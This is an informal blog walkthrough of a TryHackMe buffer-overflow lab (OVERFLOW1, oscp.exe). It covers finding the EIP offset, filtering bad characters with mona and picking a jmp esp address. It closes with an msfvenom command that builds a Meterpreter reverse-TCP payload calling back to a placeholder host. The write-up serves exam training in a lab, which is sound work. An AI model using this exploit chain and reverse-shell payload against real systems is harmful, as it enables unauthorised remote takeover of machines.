OSCP prep [Buffer Overflow]
Hello guys today we are going to solve a buffer overflow from tryhackme from room https://tryhackme.com/room/bufferoverflowprep
Im going to go over a single Buffer (OVERFLOW1) because the room is quite big and has many tasks .If you guys want to develop your skills further in buffer overflow do go through this room im sure it’ll help you guys a lot
To understand what im about to do needs a bit of previous working knowledge of buffer overflow..so be sure you understand basic buffer overflows first
So what i did was instead of using rdp and using different machine over the network i downloaded the oscp.exe from the remote machine and ran it on my windows machine .This step isn’t necessary i just did it to make myself more comfortable
so lets start
- lets run the application
2.So our target is OVERFLOW1 so lets open it in immunity debugger
3.so lets start by passing redundant data in order to crash the application
well it worked properly.Lets write a script to fuzz it
This is the script that im going to use
As you can see The offset is near 2100
EIP has been completely overwritten by our data
4.Lets create a cyclic pattern using msf module[msf-pattern_create]
Now we will send this data,you can send it using a script im going to do it manually
The most important thing right now is the EIP pointer,now take the data of EIP pointer which is 6F43396E,and use it with msf-pattern_offset it will provide you with the offset
5.Now we know what the offset is so lets begin with exploit development
After overflowing till the offset we will overwrite the EIP with BBBB which will be “42424242” in hex
6.Now lets find bad characters, for this we will use mona module
Lets create a bytearray using mona module
!mona bytearray -b ‘\x00’
This will create a bytearray excluding \x00 which is a termination byte and a bad character
You also have to use a bad character list in your exploit https://github.com/cytopia/badchars you can get it from this repository
Lets run the script
After the crash use
!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP pointer address>
As you can see we are getting badchars.There is one thing to look out for while doing this is that if 07 is corrupted then it can corrupt 08 as well so try to remove the first bad character and retry the whole process.
Now im going to remove all the badchars from my list and retry the whole process .Try again and again until you get something like this
after we got every bad character we procced to next step
7.jmp to esp
search for jmp esp instruction using mona module
!mona jmp -r esp -cpb <all the bad characters>
we are going to use the first one 0x625011af and convert it to endian format \xaf\x11\x50\x62
add this to our script or exploit
8.Payload
we are going to create a payload excluding the bad characters using msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -b <bad characters> EXITFUNC=thread -f py -v payload
and add the exploit to the script
also add some padding using NOPS \x90
start listening
And voila we got a connection back